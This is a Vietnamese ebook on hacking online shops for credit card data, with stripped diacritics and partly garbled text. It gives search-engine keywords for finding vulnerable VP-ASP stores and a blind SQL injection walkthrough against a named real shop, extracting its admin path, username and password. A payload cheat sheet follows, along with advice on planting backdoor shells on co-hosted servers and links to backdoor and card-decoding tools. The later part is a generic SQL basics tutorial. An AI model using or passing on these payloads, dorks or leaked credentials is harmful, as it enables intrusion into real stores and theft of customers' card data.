------+++----Ebook Hacking Credit Card Version 2 Lastest And The End.

Hack ch l hc hi v trao di k nng bo mt.

Title : Credit Card Should Stop ====== Author: hieupc Email: hieupc@gmail.com Yahoo: hieuitpc@yahoo.com Website: http://thegioiebook.com ============================= Sau khi hieupc hon thnh phin bn 1, hieupc cng ngh ngay n phin bn 2 ca Ebook Hacking Credit Card. V phin bn Ebook mi ny s hon thin v lp i nhng thiu st tn ti Ebook c.

Tutorial ng ch nht trong Ebook ny. Hacking Credit Card Sql Blind V.1 (Power by Tieuquainho)
C mt bi vit nm trong Ebook Hacking Credit Card version 1, c cch hack ging cch ny nhng c v y l bi vit y nht. Xin gii thiu s qua SQL Blind : y l hnh thc khai thc da vo l hng bo mt ca MSSQL, da vo l hng ny chng ta p dng nhng on m khai thc v tm kim c thng tin t Database ca Server . SQL Blind l kiu khai thc d tm tng k t, khi cc bn s dng a s cc thao thc k thut hack SQL khc m khng thnh cng th c th tm ni SQL Blind ny c th khai thng nhng b tc , tuy nhin bn mt tt lun c mt khng tt l qu trnh truy vn SQL Blind tn rt nhiu thi gian v cng sc bi v cc bn phi tm tng k t mt trong chui cn tm . VD: tm link admin th cc bn phi tm tng ch trong chui Database v link admin v ghp chng li thnh 1 chui. Ni nhiu cc bn ri thi lm lin cho chc d hiu. Chun b : - Trnh duyt Web Opera, Mozila Firefor v1.3 hoc loi khc Internet Explorer l ok. Khng nn xi Internet Explorer Hack (^|^) - 1 ly nc v 1 ci khn lau mt cha chy & lau m hi. Mc tiu: - Tt c cc Phin bn t 5.0 tr v trc ca VP-ASP (loi shop tng i nhiu li v nhiu cc cht (^|^)) - Cc Tm nhng Shop VP-ASP ny th c th tham kha nhng t kha bn di dng cho vic search trn Google, Yahoo mt site tm kim bt k no . - T Kha : + shopdisplayproducts.asp?id + shopaddtocart.asp?catalogid= - Ti ch a ra 2 t kha bi v n l nhng mc tiu chnh gip 1 trang tm kim c th tm ra c VP-ASP.

Chng ta bt u hack 1 site demo nha Mc tiu l hxxps://circleathletics.com/ (s dng VP-ASP V5.0) - u tin chng ta tm link admin ca site ny hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20f ieldname%20from%20configuration%20where%20left(fieldname,10)='xadminpage'%20 and%20left(fieldvalue,1)='a') Microsoft VBScript runtime error '800a000d' Type mismatch: 'clng' /shop/shopproductfeatures.asp, line 139 Nh vy c ngha l t kha chng ta a ra (a) khng phi l k t u tin trong chui link admin, chng ta cht suy ngh n link admin thng l shopadmin.asp th vi cu lnh sau thay ch a = s hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20f ieldname%20from%20configuration%20where%20left(fieldname,10)='xadminpage'%20 and%20left(fieldvalue,1)='s') Microsoft OLE DB Provider for SQL Server error '80040e07' Syntax error converting the varchar value 'xadminpage' to a column of data type int. /shop/shop$db.asp, line 409 - Chnh xc l ch S l k t u tien ca link admin ri, chng ta tip tc th nhng ch khc v tip theo hxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20fi eldname%20from%20configuration%20where%20left(fieldname,10)='xadminpage'%20a nd%20left(fieldvalue,2)='sh') - Ch ch ny nha (fieldvalue,2)='sh') - C tip tc thay tip vo tm ra link admin. Link admin kt thc = .asp nn khng cn tm xem chui k t c bao nhiu k t u Tip theo chng ta tm user + pass admin hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20f ldusername%20from%20tbluser%20where%20admintype='super'%20and%20left(flduser name,1)='a') Microsoft VBScript runtime error '800a000d' Type mismatch: 'clng' /shop/shopproductfeatures.asp, line 139 Ko c g ht tip tc nh th hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20f ldusername%20from%20tbluser%20where%20admintype='super'%20and%20left(flduser name,1)='c') Microsoft OLE DB Provider for SQL Server error '80040e07' Syntax error converting the varchar value 'circ54' to a column of data type int. /shop/shop$db.asp, line 409 Hin lun User ra lun site ny b li nng nu nhng site khc cc bn ng no 1 t nh khi tm link admin l ok hihi hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20f

ldusername%20from%20tbluser%20where%20admintype='super'%20and%20left(flduser name,2)='ab') y l cch tm k t th 2 , th 3 th them vo (fldusername,3)='abc') dy d m. Chng ta c user admin trn ri circ54 tm pass ca n hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20f ldpassword%20from%20tbluser%20where%20fldusername='circ54'%20and%20left(fldp assword,1)='a') Microsoft VBScript runtime error '800a000d' Type mismatch: 'clng' /shop/shopproductfeatures.asp, line 13 hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20f ldpassword%20from%20tbluser%20where%20fldusername='circ54'%20and%20left(fldp assword,1)='2') Microsoft OLE DB Provider for SQL Server error '80040e07' Syntax error converting the varchar value '2005HCP' to a column of data type int. /shop/shop$db.asp, line 409 Vy l hack c thng ny ri hihi qu d phi khng cc bn Hy vng cc bn hiu mnh vit vng lm mong mi ngi thng cm Cn y l 1 s tham kha them

*************(*** Ti`m link admin *************************************** %20or%201=(select%20fieldname%20from%20configuration%20where%20left(fieldna me,10)='xadminpage'%20and%20left(fieldvalue,1)='a') <=== Doan ki tu dau %20or%201=(select%20fieldname%20from%20configuration%20where%20left(fieldna me,10)='xadminpage'%20and%20left(fieldvalue,1)='a'%20and%20len(fieldvalue)=15) <=== Tim so ki tu . **************** Ti`m user *********************************************** %20or 1=(select fldusername from tbluser where admintype='super' and left(fldusername,1)='a') <== Ki tu dau %20or 1=(select fldusername from tbluser where admintype='super' and left(fldusername,2)='ab') <== Tim chu~ thu 2 - thu 3 thi the = so 3 va mo` tiep %20or 1=(select fldusername from tbluser where left(fldusername,1)='b' and len(fldusername)=3) <== So ki tu cua user o%20r 1=(select fldusername from tbluser where left(fldusername,1)='a') When not superAdmin

*************** Ti`m pass ************************************************ %20or 1=(select fldpassword from tbluser where fldusername='blue42jh' and left(fldpassword,1)='a') <== Ki tu dau %20or 1=(select fldpassword from tbluser where left(fldpassword,1)='b' and len(fldpassword)=3) <== So ki tu

Hacking Password th 2 ca shop ( Nghin cu ca nobita v hieupc ) Bi vit ca nobita:

Anh em xem trc code ca ci trang login 2 pass: <!--#include file="shop$db.asp"--> <% [COLOR=red]const SecondPassword="[COLOR=blue]password2[/COLOR]" const Secondpasswordmsg="Second password does not match"[/COLOR] '********************************************************************** ' Shop administration only VP-ASP Shopping Cart ' Forces user to login ' asked for userid and password ' Goes to shopadmin1.asp ' Version 4.50 ' September 7, 2002 '********************************************************************* SetSess "ShopAdmin","" SetSess "INIT","" Dim myconn Dim rs Dim username,userpassword msg="" dim rc 'on error resume next If Request("Submit")<>"" Then shopinit SetSess "Login","Force" ShopOpenDatabase myconn If GetSess("Login")="Force" then SetSess "Login","" end if username=request("Username") userpassword=request("password") username=replace(username,"'","") userpassword=replace(userpassword,"'","") if ucase(Username)<>"SUPPLIER" then sql = "select * from tbluser where fldusername='" & username & "' and

fldpassword='" & userpassword & "'" Set rs = myconn.Execute(SQL) if not rs.eof then CheckSecondpassword rc If rc=0 then GetAdminData rs else closerecordset rs shopclosedatabase myconn msg=Secondpasswordmsg & "<br>" end if else rs.close set rs=nothing LocateSupplier end if if msg="" then msg=LangAdmin01 & "<br>" end if Shopclosedatabase myconn else msg=LangAdmin01 & "<br>" Shopclosedatabase myconn end if end if AdminPageHeader if msg <> "" Then response.write getconfig("xfont") & msg & "</font>" end if %> <form action="<%=getconfig("xadminpage")%>" method="post" name="LoginForm"> <center><font face=arial size=2 color="#0080C0"><b><%=LangAdmin02%></b></font></center><br> <TABLE WIDTH=300 BORDER=1 CELLPADDING=3 CELLSPACING=0 align="center" bordercolordark="#333399" bordercolorlight="#666699"> <TR> <TD BGCOLOR="#0080C0" COLSPAN=2 ALIGN=LEFT VALIGN=TOP> <font face="Arial, Helvetica" SIZE=2 color=white><B><%=LangAdmin03%></B></FONT></TD> </TR> <TR> <TD WIDTH=50 ALIGN=LEFT VALIGN=Middle><font face="Arial, Helvetica" SIZE=2><B><%=LangAdminUserName%></B></FONT></TD> <TD ALIGN=LEFT VALIGN=TOP> <font face="Arial, Helvetica"><INPUT TYPE=TEXT NAME="UserName" VALUE="<%=Request("UserName") %>"></font></TD> </TR> <TR> <TD WIDTH=50 ALIGN=LEFT VALIGN=Middle><font face="Arial, Helvetica" SIZE=2><B><%=LangAdminPassword%></B></FONT></TD> <TD ALIGN=LEFT VALIGN=TOP><font face="Arial, Helvetica"><INPUT TYPE=PASSWORD NAME="Password"></font></td></TR>

<% If Secondpassword<>"" then %> <tr> <TD WIDTH=50 ALIGN=LEFT VALIGN=Middle><font face="Arial, Helvetica" SIZE=2><B><%=LangAdminPassword & "2"%></B></FONT></TD> <TD ALIGN=LEFT VALIGN=TOP><font face="Arial, Helvetica"><INPUT TYPE=PASSWORD NAME="Password2"></font></td></TR> <%end if %> <tr> <td></td> <td><font face="Arial, Helvetica"><INPUT TYPE=SUBMIT VALUE="<%=LangAdminLogin%>" name="Submit"></font></TD> </tr> </TABLE> </form> </center> </BODY> </HTML> <% Sub GetAdminData (rs) setsess "shopadmin" ,rs("fldusername") if isnull(rs("Admintype")) then SetSess "admintype","SUPER" else setsess "admintype",ucase(rs("admintype")) end if setsess "login" , rs("fldusername") setsess "usertables",rs("tablesallowed") setsess "adminmenus",rs("fldaccess") rs.close set rs=nothing LogUser GetSess("ShopAdmin"), "in", myconn SetSess("Supplierid"),"" Shopclosedatabase myconn CheckSecurity (userpassword) Response.redirect "shopadmin1.asp" end sub Sub LocateSupplier If getconfig("xAllowSupplierlogin")<>"Yes" then exit sub sql = "select * from suppliers where supplieruserid='" & username & "' and supplierpassword='" & userpassword & "'" Set rs = myconn.Execute(SQL) If err.number>0 then msg="database Open error<br>" & GetSess("Openerror") else If Not rs.EOF Then setsess "shopadmin" ,request("username") setsess "admintype","supplier" setsess "login" , rs("supplieruserid") setsess("supplierid"),rs("supplierid")

rs.close set rs=nothing GetUserTables ' setsess "usertables",rs("tablesallowed") LogUser GetSess("ShopAdmin"), "in", myconn Shopclosedatabase myconn response.redirect "shopadmin1.asp" else rs.close set rs=nothing end if end if end sub Sub GetUserTables dim rs sql = "select * from tbluser where fldusername='supplier'" Set rs = myconn.Execute(SQL) if err.number>0 then msg="database Open error<br>" & GetSess("Openerror") else If Not rs.EOF Then setsess "usertables",rs("tablesallowed") setsess "adminmenus",rs("fldaccess") end if end if rs.close set rs=nothing end sub Sub Checksecurity (ipassword) dim tpassword tpassword=ucase(ipassword) if tpassword="VPASP" or tpassword="ADMIN" then setsess "security","Yes" end if end sub '******************************************************************* ' if using second password facility, the validate it '******************************************************************* Sub CheckSecondPassword(rc) dim password rc=4 If secondpassword="" then rc=0 exit sub end if password=request.form("password2") if password="" then exit sub if ucase(password)<>ucase(secondpassword) then exit sub rc=0 end sub

%>

Ch ch ch v xanh, y l ni t ci pass th 2 ca shop VPASP. Lc trc nobita cn c suy lun rng ci pass 2 ny c thng VPASP fix v n nm trong database ca shop, nhng ci ny khng ng. T cch t pass 2 th ny, nobita ngh rng vic lm pass 2 ny c th do thng webmaster n edit theo hng dn ca VPASP. Cch t pass cc v tr c th khc nhau chng hn: CODE <!--#include file="shop$db.asp"--> <!--#include file="pass2.asp"--> <% trong y file pass2 cha password th 2 hoc ch ng dn ca password th 2 nm u trong ci ng database ca shop m info ca n khng thay i, to 1 table ring cha pass2 chng hn . Ngoi nhng cch t pass2 c bn ny th cch lm cng a dng ty thuc vo trnh ca cc webmaster Tuy nhin trong thi gian va qua, c 1 s anh em cho rng c code khai thc pass2, nhng thc cht l d tm trong database cc table l, nhiu kh nng cha info pass2, v d: CODE affiliates categories configuration coupons customerprices customers dtproperties gifts mycompany oitems orders

ordertracking prodcategories prodfeatures products projects quantitydiscounts registrant registryitems reviews searchresults shipmethods pass_access suppliers tblaccess tbllog tbluser CHECK_CONSTRAINTS COLUMN_DOMAIN_USAGE COLUMN_PRIVILEGES COLUMNS CONSTRAINT_COLUMN_USAGE CONSTRAINT_TABLE_USAGE DOMAIN_CONSTRAINTS DOMAINS KEY_COLUMN_USAGE REFERENTIAL_CONSTRAINTS

SCHEMATA TABLE_CONSTRAINTS TABLE_PRIVILEGES TABLES VIEW_COLUMN_USAGE VIEW_TABLE_USAGE VIEWS

V cch tm kim ny tn rt nhiu cng sc, v phi tm y cc table ca n, m vi kiu hack hin nay th l on m table, hoc blind tng k t ca table .Ngi c ngy cha chc ra 1 shop. Tuy nhin n nay nobita cng cha tm c gii php no tt hn cho loi ny . Mong rng qua bi vit ny s gip anh em tm kim pass2 c tt hn .

Bi vit ca hieupc:
Theo kinh nghim ca hieupc bit c, mun hack c password th 2 ca shop ( Secure Pass) th ch c cch hack local l nhanh v gn nht, ngoi cch hack local ny bn c th da theo bi vit kinh nghim ca nobita m ly c pass 2. C v vic hack local tr nn rt d khi bn c mt host trong tay, v ch cn upload 1 con backdoor ln chng hn nh con remview.php l c th hack. Tuy nhin vic ny i hi bn phi c kin thc vng v Hosting v DNS. Bn mun bit c shop nm server no bn c th check DNS hoc IP nh v, v t bn ln theo m ng k cho mnh 1 host cng host vi shop bn cn ly pass 2. Cn vic hack local v check DNS th no hay hiu r thm v host cc bn c th gh thm cc trang sau y c hng dn c th: http://viethacker.org , http://hvaonline.net v check DNS, kim tra thng tin bn: http://pavietnam.net , http://checkdomain.com , http://whoisc.com , http://check-dns.com . Ngoi ra, cn nhiu trang web khc, bn c th ln google.com search. Remview.php : http://php.spb.ru/remview/remview_2003_10_23.zip Ngoi ra cn nhiu Mshell, Backdoor khc c th kim trn google.com hoc qua trang http://viethacker.org Decode CC b m ha: http://rapidshare.de/files/8343810/decodecc.rar.html (pass unrar : thegioiebook.com )

Nhng bi cn phi c nm vng kin thc Hacking Credit Card.

- Gii thiu v SQL.

Ngun t diendantinhoc.net ~~~~~~~~~~~~~~~~~~~~~~~ SQL l chun ngn ng ANSI truy cp CSDL.

SQL l g?

SQL l vit tt ca Structured Query Language - Ngn ng truy vn cu trc. SQL cho php bn truy cp vo CSDL. SQL l mt chun ngn ng ca ANSI. SQL c th thc thi cc cu truy vn trn CSDL. SQL c th ly d liu t CSDL. SQL c th chn d liu mi vo CSDL. SQL c th xo d liu trong CSDL. SQL c th sa i d liu hin c trong CSDL. SQL d hc :-) SQL l mt chun

SQL l mt chun ca ANSI (American National Standards Institute - Vin tiu chun quc gia Hoa k) v truy xut cc h thng CSDL. Cc cu lnh SQL c s dng truy xut v cp nht d liu trong mt CSDL.

SQL hot ng vi hu ht cc chng trnh CSDL nh MS Access, DB2, Informix, MS SQL Server, Oracle, Sybase v.v...

Lu : Hu ht cc chng trnh CSDL h tr SQL u c phn m rng cho SQL ch hot ng vi chnh chng trnh .

Bng CSDL

Mt CSDL thng bao gm mt hoc nhiu bng (table). Mi bng c xc nh thng qua mt tn (v d Customers hoc Orders). Bng cha cc mu tin - dng (record - row),

l d liu ca bng.

Di y l mt v d v mt bng c tn l Persons (ngi):

LastName FirstName Address City Hansen Ola Timoteivn 10 Sandnes Svendson Tove Borgvn 23 Sandnes Pettersen Kari Storgt 20 Stavanger

Bng trn bao gm 3 mu tin (dng), mi mu tin tng ng vi mt ngi, v bn ct (LastName, FirstName, Address v City).

Cu truy vn SQL

Vi SQL ta c th truy vn CSDL v nhn ly kt qu tr v thng qua cc cu truy vn.

Mt cu truy vn nh sau:

SELECT LastName FROM Persons

S tr v kt qu nh sau:

LastName Hansen Svendson Pettersen

Lu : Mt s h thng CSDL i hi cu lnh SQL phi kt thc bng mt du chm phy (;). Chng ta s khng dng du chm phy trong bi vit ny.

SQL l ngn ng thao tc d liu (DML - Data Manipulation Language)

SQL l c php thc thi cc cu truy vn. SQL cng bao gm c php cp nht -

sa i, chn thm v xo cc mu tin.

Sau y l danh sch cc lnh v truy vn dng DML ca SQL:

SELECT - ly d liu t mt bng CSDL. UPDATE - cp nht/sa i d liu trong bng. DELETE - xo d liu trong bng. INSERT INTO - thm d liu mi vo bng. SQL l ngn ng nh ngha d liu (DDL - Data Definition Language)

Phn DDL ca SQL cho php to ra hoc xo cc bng. Chng ta cng c th nh ngha cc kho (key), ch mc (index), ch nh cc lin kt gia cc bng v thit lp cc quan h rng buc gia cc bng trong CSDL.

Cc lnh DDL quan trng nht ca SQL l:

CREATE TABLE - to ra mt bng mi. ALTER TABLE - thay i cu trc ca bng. DROP TABLE - xo mt bng. CREATE INDEX - to ch mc (kho tm kim - search key). DROP INDEX - xo ch mc c to.

-Cu lnh SELECT

Cu lnh SELECT c dng truy xut d liu t mt bng. Kt qu tr v di dng bng c lu trong 1 bng, gi l bng kt qu - result table (cn c gi l tp kt qu - result set).

C php

C php ca cu lnh SELECT nh sau:

SELECT tn_cc_ct FROM tn_bng

Truy xut nhiu ct

truy xut cc ct mang tn LastName v FirstName, ta dng mt cu lnh SELECT nh sau:

SELECT LastName, FirstName FROM Persons

Bng Persons:

LastName FirstName Address City Hansen Ola Timoteivn 10 Sandnes Svendson Tove Borgvn 23 Sandnes Pettersen Kari Storgt 20 Stavanger

Kt qu tr v:

LastName FirstName Hansen Ola Svendson Tove Pettersen Kari

Truy xut tt c cc ct

truy xut tt c cc ct t bng Persons, ta dng k hiu * thay cho danh sch cc ct:

SELECT * FROM Persons

Kt qu tr v:

LastName - FirstName- Address -City

Hansen - Ola -Timoteivn 10 - Sandnes Svendson - Tove -Borgvn 23 - Sandnes Pettersen -Kari -Storgt 20 -Stavanger

Tp kt qu

Kt qu tr v t mt cu truy vn SQL c lu trong 1 tp kt qu (result set). Hu ht cc h thng chng trnh CSDL cho php duyt qua tp kt qu bng cc hm lp trnh nh Move-To-First-Record, Get-Record-Content, Move-To-Next-Record v.v...

Du chm phy (;) pha sau cu lnh

Du chm phy l mt cch chun phn cch cc cu lnh SQL nu nh h thng CSDL cho php nhiu cu lnh SQL c thc thi thng qua mt li gi duy nht.

Cc cu lnh SQL trong bi vit ny u l cc cu lnh n (mi cu lnh l mt v ch mt lnh SQL). MS Access v MS SQL Server khng i hi phi c du chm phy ngay sau mi cu lnh SQL, nhng mt s chng trnh CSDL khc c th bt buc bn phi thm du chm phy sau mi cu lnh SQL (cho d l cu lnh n). Xin nhc li, trong bi vit ny chng ta s khng dng du chm phy cui cu lnh SQL. -Mnh WHERE

truy xut d liu trong bng theo cc iu kin no , mt mnh WHERE c th c thm vo cu lnh SELECT.

C php

C php mnh WHERE trong cu lnh SELECT nh sau:

SELECT tn_ct FROM tn_bng WHERE tn_ct php_ton gi_tr

Trong mnh WHERE, cc php ton c s dng l

Php ton M t = So snh bng <> So snh khng bng > Ln hn < Nh hn >= Ln hn hoc bng <= Nh hn hoc bng BETWEEN Nm gia mt khong LIKE So snh mu chui

Lu : Trong mt s phin bn ca SQL, php ton <> c th c vit di dng !=

S dng mnh WHERE

ly danh sch nhng ngi sng thnh ph Sandnes, ta s dng mnh WHERE trong cu lnh SELECT nh sau:

SELECT * FROM Persons WHERE City = 'Sandnes'

Bng Persons:

LastName FirstName Address City Year

-------------------------------------------

-AND v OR

Hai ton t AND v OR ni hai hoc nhiu iu kin trong mnh WHERE li vi nhau.

Ton t AND s hin th 1 dng nu TT C cc iu kin u tho mn. Ton t OR

hin th mt dng nu BT K iu kin no c tho.

Bng d liu dng trong v d

LastName FirstName Address City Hansen Ola Timoteivn 10 Sandnes Svendson Tove Borgvn 23 Sandnes Svendson Stephen Kaivn 18 Sandnes

V d 1

S dng AND tm nhng ngi c tn l Tove v h l Svendson:

SELECT * FROM Persons WHERE FirstName = 'Tove' AND LastName = 'Svendson' Kt qu tr v:

LastName FirstName Address City Svendson Tove Borgvn 23 Sandnes

V d 2

S dng OR tm nhng ngi c tn l Tove hoc h l Svendson:

SELECT * FROM Persons WHERE firstname = 'Tove' OR lastname = 'Svendson' Kt qu tr v:

LastName FirstName Address City Svendson Tove Borgvn 23 Sandnes Svendson Stephen Kaivn 18 Sandnes

V d 3

Bn cng c th s dng kt hp AND v OR cng vi du ngoc n to nn cc cu truy vn phc tp:

SELECT * FROM Persons WHERE (FirstName = 'Tove' OR FirstName = 'Stephen') AND LastName = 'Svendson' Kt qu tr v:

LastName FirstName Address City Svendson Tove Borgvn 23 Sandnes Svendson Stephen Kaivn 18 Sandnes

Hansen Ola Timoteivn 10 Sandnes 1951 Svendson Tove Borgvn 23 Sandnes 1978 Svendson Stale Kaivn 18 Sandnes 1980 Pettersen Kari Storgt 20 Stavanger 1960

Kt qu tr v:

LastName FirstName Address City Year Hansen Ola Timoteivn 10 Sandnes 1951 Svendson Tove Borgvn 23 Sandnes 1978 Svendson Stale Kaivn 18 Sandnes 1980

S dng du nhy

Lu rng v d trn ta s dng hai du nhy n (') bao quanh gi tr iu kin 'Sandnes'.

SQL s dng du nhy n bao quanh cc gi tr dng chui vn bn (text). Nhiu h CSDL cn cho php s dng du nhy kp ("). Cc gi tr dng s khng dng du nhy bao quanh.

Vi d liu dng chui vn bn:

Cu lnh ng: SELECT * FROM Persons WHERE FirstName = 'Tove'

Cu lnh sai: SELECT * FROM Persons WHERE FirstName = Tove

Vi d liu dng s:

Cu lnh ng: SELECT * FROM Persons WHERE Year > 1965

Cu lnh sai: SELECT * FROM Persons WHERE Year > '1965'

Php ton iu kin LIKE

Php ton LIKE c dng tm kim mt chui mu vn bn trn mt ct.

C php

C php ca php ton LIKE nh sau:

SELECT tn_ct FROM tn_bng WHERE tn_ct LIKE mu

Mt k hiu % c th c s dng nh ngha cc k t i din. % c th c t

trc v/hoc sau mu.

S dng LIKE

Cu lnh SQL sau s tr v danh sch nhng ngi c tn bt u bng ch O:

SELECT * FROM Persons WHERE FirstName LIKE 'O%'

Cu lnh SQL sau s tr v danh sch nhng ngi c tn kt thc bng ch a:

SELECT * FROM Persons WHERE FirstName LIKE '%a'

Cu lnh SQL sau s tr v danh sch nhng ngi c tn kt cha chui la:

SELECT * FROM Persons WHERE FirstName LIKE '%la%' Ton t BETWEEN...AND

ly ra mt min d liu nm gia hai gi tr. Hai gi tr ny c th l s, chui vn bn hoc ngy thng.

SELECT tn_ct FROM tn_bng WHERE tn_ct BETWEEN gi_tr_1 AND gi_tr_2

Bng d liu dng trong v d

LastName FirstName Address City Hansen Ola Timoteivn 10 Sandnes Nordmann Anna Neset 18 Sandnes Pettersen Kari Storgt 20 Stavanger

Svendson Tove Borgvn 23 Sandnes

V d 1

Tm tt c nhng ngi c h (sp xp theo ABC) nm gia Hansen (tnh lun Hansen) v Pettersen (khng tnh Pettersen):

SELECT * FROM Persons WHERE LastName BETWEEN 'Hansen' AND 'Pettersen'

Kt qu tr v:

LastName FirstName Address City Hansen Ola Timoteivn 10 Sandnes Nordmann Anna Neset 18 Sandnes

Lu quan trng: Ton t BETWEEN...END s tr v nhng kt qu khc nhau trn cc h CSDL khc nhau. Vi mt s h CSDL, ton t BETWEEN...END s tr v cc dng m c gi tr thc s "nm gia" hai khong gi tr (tc l b qua khng tnh n cc gi tr trng vi gi tr ca hai u mt). Mt s h CSDL th s tnh lun cc gi tr trng vi hai u mt. Trong khi mt s h CSDL khc li ch tnh cc gi tr trng vi u mt th nht m khng tnh u mt th hai (nh v d pha trn). Do vy, bn phi kim tra li h CSDL m bn ang dng khi s dng ton t BETWEEN...AND.

V d 2

tm nhng ngi c h (sp xp theo ABC) nm ngoi khong hai gi tr v d 1, ta dng thm ton t NOT:

SELECT * FROM Persons WHERE LastName NOT BETWEEN 'Hansen' AND 'Pettersen'

Kt qu tr v:

LastName FirstName Address City Pettersen Kari Storgt 20 Stavanger Svendson Tove Borgvn 23 Sandnes

-------------------------------

T kho DISTINCT

Cu lnh SELECT s tr v thng tin v cc ct trong bng. Nhng nu chng ta khng mun ly v cc gi tr trng nhau th sau?

Vi SQL, ta ch cn thm t kho DISTINCT vo cu lnh SELECT theo c php sau:

SELECT DISTINCT tn_ct FROM tn_bng

V d: Tm tt c cc cng ty trong bng t hng

Bng t hng ca ta nh sau:

Company OrderNumber Sega 3412 W3Schools 2312 Trio 4678 W3Schools 6798

Cu lnh SQL sau:

SELECT Company FROM Orders

S tr v kt qu:

Company

Sega W3Schools Trio W3Schools

Tn cng ty W3Schools xut hin hai ln trong kt qu, i khi y l iu chng ta khng mun.

V d: Tm tt c cc cng ty khc nhau trong bng t hng

Cu lnh SQL sau:

SELECT DISTINCT Company FROM Orders

S tr v kt qu:

Company Sega W3Schools Trio

Tn cng ty W3Schools by gi ch xut hin 1 ln, i khi y l iu chng ta mong mun

--------------------------------

T kho ORDER BY c s dng sp xp kt qu tr v.

Sp xp cc dng

Mnh ORDER BY

c dng sp xp cc dng.

V d bng Orders:

Company OrderNumber Sega 3412 ABC Shop 5678 W3Schools 2312 W3Schools 6798

V d:

ly danh sch cc cng ty theo th t ch ci (tng dn):

SELECT Company, OrderNumber FROM Orders ORDER BY Company

Kt qu tr v:

Company OrderNumber ABC Shop 5678 Sega 3412 W3Schools 6798 W3Schools 2312

V d:

Ly danh sch cc cng ty theo th t ch ci (tng dn) v ho n t hng theo th t s tng dn:

SELECT Company, OrderNumber FROM Orders ORDER BY Company, OrderNumber

Kt qu tr v:

Company OrderNumber ABC Shop 5678 Sega 3412 W3Schools 2312 W3Schools 6798

V d:

Ly danh sch cc cng ty theo th t gim dn:

SELECT Company, OrderNumber FROM Orders ORDER BY Company DESC

Kt qu tr v:

Company OrderNumber W3Schools 6798 W3Schools 2312 Sega 3412 ABC Shop 5678 Cu lnh INSERT INTO Cu lnh INSERT INTO c dng chn dng mi vo bng.

C php:

INSERT INTO tn_bng VALUES (gi_tr_1, gi_tr_2,....)

Bn cng c th ch r cc ct/trng no cn chn d liu:

INSERT INTO tn_bng (ct_1, ct_2,...) VALUES (gi_tr_1, gi_tr_2,....)

Chn 1 dng mi

Ta c bng Persons nh sau:

LastName FirstName Address City Pettersen Kari Storgt 20 Stavanger

Cu lnh SQL sau:

INSERT INTO Persons VALUES ('Hetland', 'Camilla', 'Hagabakka 24', 'Sandnes')

s tora kt qu trong bng Persons nh sau:

LastName FirstName Address City Pettersen Kari Storgt 20 Stavanger Hetland Camilla Hagabakka 24 Stavanger

Chn d liu vo cc ct/trng c th

Vi bng Persons nh trn, cu lnh SQL sau:

INSERT INTO Persons (LastName, Address) VALUES ('Rasmussen', 'Storgt 67')

S to ra kt qu:

LastName FirstName Address City Pettersen Kari Storgt 20 Stavanger Hetland Camilla Hagabakka 24 Stavanger Rasmussen Storgt 67

-------------------------Cu lnh UPDATE

Cu lnh UPDATE c s dng cp nht/sa i d liu c trong bng.

C php:

UPDATE tn_bng SET tn_ct = gi_tr_mi WHERE tn_ct = gi_tr

V d: bng Person ca ta nh sau:

LastName FirstName Address City Nilsen Fred Kirkegt 56 Stavanger Rasmussen Storgt 67

Cp nht 1 ct trn 1 dng

Gi s ta mun b xung thm phn tn cho ngi c h l Rasmussen:

UPDATE Person SET FirstName = 'Nina' WHERE LastName = 'Rasmussen'

Ta s c kt qu nh sau:

LastName FirstName Address City Nilsen Fred Kirkegt 56 Stavanger Rasmussen Nina Storgt 67

Cp nht nhiu ct trn 1 dng

By gi ta li mun i tn v a ch:

UPDATE Person SET Address = 'Stien 12', City = 'Stavanger' WHERE LastName = 'Rasmussen'

Kt qu s l:

LastName FirstName Address City Nilsen Fred Kirkegt 56 Stavanger Rasmussen Nina Stien 12 Stavanger

-------------------------

Cu lnh DELETE

c dng xo cc dng ra khi bng.

C php:

DELETE FROM tn_bng WHERE tn_ct = gi_tr

V d: Bng Person ca ta nh sau:

LastName FirstName Address City Nilsen Fred Kirkegt 56 Stavanger Rasmussen Nina Stien 12 Stavanger

Xo 1 dng:

Ta xo ngi c tn l Nina Rasmussen:

DELETE FROM Person WHERE LastName = 'Rasmussen'

Kt qu sau khi xo:

LastName FirstName Address City Nilsen Fred Kirkegt 56 Stavanger

Xo tt c cc dng:

i khi ta mun xo tt c d liu trong bng nhng vn gi li bng cng vi cu trc v tt c cc thuc tnh ca bng, ta c th dng cu lnh:

DELETE FROM table_name

hoc

DELETE * FROM table_name SQL c sn lnh m cc dng trong CSDL.

C php ca hm COUNT:

SELECT COUNT(tn_ct) FROM tn_bng

Hm COUNT(*):

Hm COUNT(*) tr v s lng cc dng c chn trong bng.

V d ta c bng Persons nh sau:

Name Age Hansen, Ola 34 Svendson, Tove 45 Pettersen, Kari 19

Cu lnh sau s tr v s lng cc dng trong bng:

SELECT COUNT(*) FROM Persons

v kt qu tr v s l:

Cu lnh sau s tr v s lng nhng ngi ln hn 20 tui:

SELECT COUNT(*) FROM Persons WHERE Age > 20

kt qu tr v s l:

Hm COUNT(column):

Hm COUNT(column) s tr v s lng cc dng c gi tr khc NULL ct c ch nh.

V d ta c bng Persons nh sau:

Name Age Hansen, Ola 34 Svendson, Tove 45 Pettersen, Kari

Cu lnh sau s tr v s lng nhng ngi m ct Age trong bng khng rng:

SELECT COUNT(Age) FROM Persons

v kt qu tr v s l:

Mnh COUNT DISTINCT

Lu : Cc v d di y ch hot ng vi CSDL Oracle v MS SQL Server, khng hot ng trn MS Access (cha th nhim vi cc h CSDL khc!)

T kho DISTINCT v COUNT c th c dng chung vi nhau m s lng cc kt qu khng trng nhau.

C php nh sau:

SELECT COUNT(DISTINCT column(s)) FROM table

V d ta c bng Orders nh sau:

Company OrderNumber Sega 3412 W3Schools 2312 Trio 4678 W3Schools 6798

Cu lnh SQL sau:

SELECT COUNT(DISTINCT Company) FROM Orders

s tr v kt qu l:

SQL nng cao

Hm

SQL c sn kh nhiu hm thc hin m v tnh ton.

C php:

C php gi hm trong cu lnh SQL nh sau:

SELECT function(tn_ct) FROM tn_bng

